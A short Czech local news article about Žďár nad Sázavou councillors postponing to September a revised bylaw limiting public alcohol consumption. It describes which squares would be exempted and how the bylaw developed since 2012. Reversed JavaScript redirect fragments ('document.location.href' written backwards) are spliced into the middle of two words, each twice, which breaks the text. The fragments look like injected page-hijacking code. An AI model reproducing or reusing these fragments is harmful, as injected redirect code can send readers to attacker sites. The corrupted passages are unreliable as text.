Rainbow page separator

K vyhlášce omezující alkohol se Žďárští vrátí po prázdninách

Neděle, 17. července 2022

Žďár nad Sázavou / S největší pravděpodobností v září se žďárští zastupitelé vrátí k místní vyhlášce omezující konzumaci alkoholu na veřejnosti v některých lokalitách města, na jejíž konečné podobě po úpravě se zatím nedohodli. Stávající vyhláška platí od roku 2016 a v návrhu její nové verze měla ze zákazu „vypadnout“ Farská humna, ale také náměstí Republiky, pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor před muzeem a za Domem kultury – obecně místa, kde se konají různé společenské a kulturní akce. Dosud pro konkrétní aktivity radní na základě žádosti schvalovali individuální výjimky, což nyní už ale není možné. A ve vyhlášce musí být coby výjimka vymezen konkrétní den jako třeba 31. prosince nebo 30. dubna, případně časové rozmezí platnosti výjimky.
K zavedení zákazu konzumace alkoholu na veřejnosti v některých částech města místní vyhláškou došlo už v roce 2012, o čtyři roky později byl výčet míst bez alkoholu rozšířen na současný stav a norma rovněž upravena tak, aby v ní nebylo definováno, že zákaz požívání alkoholu se nevztahuje na akce města. To by právně bylo pro ostatní pořadatele diskriminující.
Radnice nyní hodlá upravit poněkud dvojsečnou místní vyhlášku tak, aby na jedné straně povolovala příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostnou konzumaci alkoholu, zároveň však nenahrávala alkoholikům s krabicemi levného vína budícím veřejné pohoršení. Strážníci i policisté nicméně mimo jiné stále zasahují i tam, kde je konzumace alkoholu už léta zapovězena, přičemž nezřídka značně podnapilí aktéři alkoholových dýchánků o zákazu buď neví, anebo ho nerespektují.